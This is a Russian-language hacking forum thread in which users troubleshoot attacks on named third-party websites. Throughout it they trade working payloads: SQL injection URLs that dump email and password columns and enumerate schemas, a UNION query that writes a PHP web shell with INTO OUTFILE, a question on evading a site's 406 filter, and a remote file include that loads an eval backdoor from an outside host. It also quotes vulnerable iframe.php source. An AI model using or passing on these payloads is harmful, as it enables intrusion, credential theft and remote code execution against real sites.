запрос +UNION+SELECT+1,`<? system($_GET[cmd]); ?>`,3+from+mysql.user+into+outfile+`0x2f746d702f31312e706870`--+ в ответ ошибка supplied argument is not a valid MySQL result resource in Подскажите где она?
во первых получишь ошибку Unknown column '<? system($_GET[cmd]); ?>' in 'field list' (указывать надо в прямых ковычках) во вторых путь к файлу (После into outfile) надо указать в ковычках а не в ( `` ) в третих нельзя захексить путь
это шутка????from+0x7573657273 http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,concat_ws(0x3a,email,password),4,5,6+fr om+users+--+ http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,column_name,4,5,6+fr om+information_schema.columns+where+table_name=0x7573657273+--+ как то так что бы тебе понятнее было что ты пытаешься сделать
http://www.sait.ru/comment.php?idart=-11364+union+%0A+select+1,2,email,password,4,5,6+fr om+0x7573657273-- в этом????????? в этом запросе он теб не покажет ни какие имайлы и пароли, чуть выше я тебе показал более менее рабочий запрос
concat_ws() выводит в одном выводимом поле несколько значений которые определяются первыми символами до запятой, а все после запросы будут выводиться разделяясь первыми символами.
нет там больше баз. http://www.chelsi.ru/comment.php?idart=-11364+union+%0A+select+1,2,schema_name,4,5,6+from+information_schema.schemata чел, ответы на ВСЕ свои вопросы, заданные в этой теме ты легко можешь найти в поиске или в манах, например в том, ссылку на который я запостил выше. а разжевать всё и положить в ротик, означает создать новый поток тупых вопросов.
Привет! Проблема вот в чём, на сервере наверно сайт фильтр. Когда делаю запрос - http://www.adlucem.info/?sadala=-15+union+select+1,2,3,4,5,6,7,8,9-- появляется Not Acceptable 406 и так на всех сайтах на серверы где есть ошибка. Как можно это обойти? Спасибо за внимание!
Всем доброго дня. Можно ли как-то использовать http://www.kid.ru/forum/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=' ? Бился я долго, но проблема в LIMIT после ORDER BY.
Привет. Пытаюсь приинклудить файл: http://www.vergaviagrande.it/iframe.php?file=http://serpov-alex.narod2.ru/1.txt В нем такое содержимое: <?php eval($_GET[e]);?> Но в результате содержимое файла тупо выводиться на экран. Я так понимаю что ничего не получиться. Но если сделать так: http://www.vergaviagrande.it/iframe.php?file=qwe То выведутся ошибки, точно такие, какие наводят во всех статьях про пхп-инклуды. Собственно вопрос: что я не так делаю?
=Zeus= инклуд тоже есть, но локальный просто скрипт хуего написано, заблуждает логика такая, если в имени файла есть http:// то файл открывается в фрейме, если имя файла локальное, то инклудится (во всяком случий я так понял)
iframe.php PHP: <?php /************************************************************************/ /* iFRAME for PhpNuke /* Copyright (c) 2002 by Xavi Gil ([email protected]) /* http://www.desarrollonuke.org /* /* USE: iframe.php?file=URL /* /* This program is free software. You can redistribute it and/or modify /* it under the terms of the GNU General Public License as published by /* the Free Software Foundation; either version 2 of the License. /************************************************************************/ if (!isset($mainfile)) { include("mainfile.php"); } $index = 0; $height = 600; include("header.php"); OpenTable(); if( substr($file,0,5)!="./../" && substr($file,0,7)!="http://" ){ include ($file); CloseTable(); include("footer.php"); } else { echo "<IFRAME src=\"$file\" width=\"100%\" height=\"$height\" scrolling=\"auto\" frameborder=\"0\">"; echo "</IFRAME><center><hr size=\"1\" noshade><a href=\"$file\" target=\"_blank\">$file</a></center>"; CloseTable(); include("footer.php"); } ?> говорил же,